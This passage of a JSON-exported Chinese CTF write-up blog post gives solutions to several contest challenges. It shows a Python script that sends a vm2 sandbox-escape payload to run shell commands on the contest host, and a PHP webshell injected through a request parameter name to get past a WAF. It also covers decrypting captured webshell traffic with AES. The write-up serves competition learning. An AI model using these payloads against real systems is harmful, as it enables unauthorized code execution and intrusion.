src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"522\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/image3-1024x522.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1822\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u66ff\u6362cookie\u8dd1\u811a\u672c\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\n\nurl = 'http:\/\/116.236.144.37:27900\/vm2'\ndata = {\"code\":\"eval(\\\"const stack=()=>{new Error().stack;stack();};err = {};const handler = {getPr\\\"+\\\"ototypeOf(target) {(stack)();}};const proxiedErr = new Proxy(err, handler);try {throw proxiedErr;} catch ({constructor: c}) {c.constructor('return process')().mainModule.require('child_process').execSync('cat \/f*');}\\\")\"}\nheaders = {\n    \"Content-Type\": \"application\/json\",\n    \"Cookie\": \"rt_web_csrf_token=ct6wK4YrkN84eUiKXteHENamjzQh4qwgw5Mnwxjqp5vvbqQElt1YHKSpteC8dsS4; rt_web__jwt_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZjQyYjRhZTQ1N2FhMzEyNjE5ZTZhOWU2MTI1NzI4MjIiLCJ1c2VybmFtZSI6IjE1MzEwODE1OTgwIiwiZXhwIjoxNjg0NjQ2NjAxLCJlbWFpbCI6IjI0MjU0MDQyNDBAcXEuY29tIn0.n4edxXhQMx3waR-aWiL2Di8WhkW9mhVCNTgOg6gvCk4; connect.sid=s%3AnWhaRQblCwhal3RbKAv1tuAojCznvfdS.E17HsBqhQ7h5zxzRIKwHPnctzLFClG7U9LItEJSTpBg\"\n}\nresponse = requests.post(url, json=data, headers=headers)\nprint(response.text)<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">fun_java<\/h2>\n\n\n\n<p>Jckson\u8c03getter\uff0c\u7136\u540eTemplatesImpl\u547d\u4ee4\u6267\u884c\uff0c\u548c\u963f\u91cc\u4e91bypass_1\u5dee\u4e0d\u591a\uff0c\u4f46\u6211\u6ca1\u505a\u51fa\u6765<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">easy_log<\/h2>\n\n\n\n<p>\u8fd9\u4e2a\u9898\u86ee\u6709\u610f\u601d\u7684\uff0c\u9996\u5148\u67e5\u770b\u6e90\u7801\uff0c\u4f1a\u53d1\u73b0\u9898\u76ee\u4f1a\u7528\u4e00\u4e2aphp\u6587\u4ef6\u8bb0\u5f55\u4f60\u7684\u767b\u5f55\u65e5\u5fd7\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-50-1024x151.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"151\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-50-1024x151.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1823\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u4f60\u5982\u679c\u60f3\u901a\u8fc7\u4fee\u6539username\u6216\u8005password\u7684\u503c\u5199\u9a6c\u90fd\u662f\u4e0d\u592a\u73b0\u5b9e\u7684\uff0c\u56e0\u4e3apassword\u7684\u503c\u662f\u88abmd5\u540e\u5199\u5165\u7684\uff0c\u800cusername\u90a3\u91cc\u80fd\u8fc7\u6ee4\u7684\u90fd\u8fc7\u6ee4\u7684\u5dee\u4e0d\u591a\u4e86&lt;\uff0c\u5f15\u53f7\u5565\u7684\u90fd\u4e0d\u80fd\u51fa\u73b0\uff0c\u806a\u660e\u7684\u4eba\u53ef\u80fd\u4f1a\u60f3\u5230\u90a3\u4e2aip\u6216\u8005url\u80fd\u4e0d\u80fd\u5199\u9a6c\u5462\uff0c\u8fd9\u786e\u5b9e\u662f\u53ef\u4ee5\u7684\uff0c\u6211\u4eec\u53ef\u4ee5\u8fd9\u6837\u4f20\u503c\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-52-1024x484.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"484\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-52-1024x484.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1825\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-51-1024x185.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"185\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-51-1024x185.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1824\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u4e0d\u662f\u5199\u8fdbphp\u53bb\u4e86\u5417\uff0c\u600e\u4e48\u6ca1\u89e3\u6790\u5462\uff1f\u6211\u4eec\u67e5\u770b\u6e90\u7801\u53ef\u4ee5\u53d1\u73b0\uff0c\u9898\u76ee\u7684waf\u76f4\u63a5\u628a&lt;\u66ff\u6362\u6210&amp;lt;\uff0c\u8fd9\u73a9\u610f\u513f\u53ea\u662f\u5728html\u91cc\u770b\u8d77\u6765\u662f&lt;\uff0c\u5f53\u7136\u4e0d\u662f\u6b63\u786e\u7684\u8bed\u6cd5<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-53.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"615\" height=\"118\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-53.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1826\"  sizes=\"auto, (max-width: 615px) 100vw, 615px\" \/><\/div><\/figure>\n\n\n\n<p>\u6240\u4ee5\u5176\u5b9e\u8def\u88ab\u5835\u6b7b\u7684\u5dee\u4e0d\u591a\u4e86\uff0c\u4f46\u8fd8\u6709\u4e00\u79cd\u795e\u5947\u7684\u505a\u6cd5\uff0c\u5c31\u662f\u4fee\u6539\u4f20\u53c2\u7684\u5c5e\u6027\uff0c\u628ausername=123\u6539\u6210username[123]=123\uff0c\u8fd9\u6837\u7684\u60c5\u51b5\u4e0b\u65e2\u6ca1\u6709\u6539\u53d8\u53c2\u6570\u7684\u540d\uff0c\u670d\u52a1\u5668\u53ef\u4ee5\u89e3\u6790\uff0c\u65e2\u7ed5\u8fc7\u4e86waf\uff0c\u56e0\u4e3awaf\u53ea\u5bf9\u53c2\u6570\u7684\u503c\u6709\u6548\uff0c\u5bf9\u53c2\u6570\u662f\u65e0\u6548\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-54-1024x71.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"71\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-54-1024x71.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1827\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u8fd9\u6837\u503c\u5b8c\u5168\u53ef\u63a7\u4e86\uff0c\u6240\u4ee5\u76f4\u63a5\u5199\u9a6c\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>password=asd&amp;username&#91;&lt;?php system(base64_decode(Y2F0IC9TM3JlY3RfMVNfSDNyZQ)); ?>]=123<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-55-1024x94.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"94\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-55-1024x94.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1828\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">misc<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">good_http<\/h2>\n\n\n\n<p>\u5bf9\u4e24\u5f20\u56fe\u7247\u8fdb\u884c\u76f2\u6c34\u5370<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 bwmforpy3.py decode one.png theother.png flag.png<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/flag.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"952\" height=\"1000\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/flag.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1829\"  sizes=\"auto, (max-width: 952px) 100vw, 952px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f97\u5230\u5bc6\u7801:XD8C2VOKEU<\/p>\n\n\n\n<p>\u89e3\u5f00\u538b\u7f29\u5305\u540e\u5373\u53ef\u83b7\u5f97flag<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">complicated_http<\/h2>\n\n\n\n<p>\u5bfc\u51fa\u6240\u6709\u6587\u4ef6\uff0c\u5728index(5).php\u91cc\u627e\u5230aes\u52a0\u5bc6\u7684key=9d239b100645bd71<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\r\n@error_reporting(0);\r\nfunction Decrypt($data)  \r\n{  \r\n    $key=\"9d239b100645bd71\"; \r\n    $magicNum=hexdec(substr($key,0,2))%16; \r\n    $data=substr($data,0,strlen($data)-$magicNum); \r\n    return openssl_decrypt(base64_decode($data), \"AES-128-ECB\", $key,OPENSSL_PKCS1_PADDING);  \r\n}\r\n$post=Decrypt(\"\");\r\necho $post;\r\n?><\/code><\/pre>\n\n\n\n<p>\u7ee7\u7eed\u5bfb\u627eflag\u6587\u4ef6\uff0c\u5728shell(41).php\u91cc\u627e\u5230\u88ab\u52a0\u5bc6\u8fc7\u540e\u7684flag<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SBUlHlBCQI4q5uAXto4aSZGYIJqdgdOd\/zGfTGZaRaysJWFdgWdnnwRT5x7l\/bA6pUoX8pqJNgsNiviuI6anfGgdPjNiPkl3l4seUceQgOb99PwAD9JJwbia\/5GHwRTa8\ufffd\u0018\ufffd\ufffdp\u0015\ufffdw\ufffd \ufffd7<\/code><\/pre>\n\n\n\n<p>\u5728<a href=\"http:\/\/tool.chacuo.net\/cryptaes\">\u5728\u7ebf\u7f51\u7ad9<\/a>\u7528key\u5bf9\u5bc6\u6587\u8fdb\u884caes\u89e3\u5bc6\uff0c\u5f97\u5230\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\"status\":\"c3VjY2Vzcw==\",\"msg\":\"ZmxhZ3sxZWM1YmU1YS1hZmJkLTQ4NjctODAwYi0zZWI3MzliOWUzYmR9Cg==\"}<\/code><\/pre>\n\n\n\n<p>base64\u540e\u5f97\u5230flag:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>flag{1ec5be5a-afbd-4867-800b-3eb739b9e3bd}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u54ce\uff0c\u4e00\u5929\u5c31\u6211\u4e00\u4e2a\u4eba\u5728\u6253\uff0c\u961f\u53cb\u7ed9\u529b\u70b9\u5e94\u8be5\u5c31\u664b\u7ea7\u4e86\uff0c\u6c34\u5b50\u54e5\u80cc\u9505\uff0c\u4e0d\u8fc7\u81ea\u5df1\u83dc\u4e5f\u662f\u4e3b\u8981\u539f\u56e0\ud83d\ude04 crypto bird  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-1816","post","type-post","status-publish","format-standard","hentry","category-wp"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1816","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=1816"}],"version-history":[{"count":2,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1816\/revisions"}],"predecessor-version":[{"id":1834,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1816\/revisions\/1834"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=1816"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=1816"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=1816"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}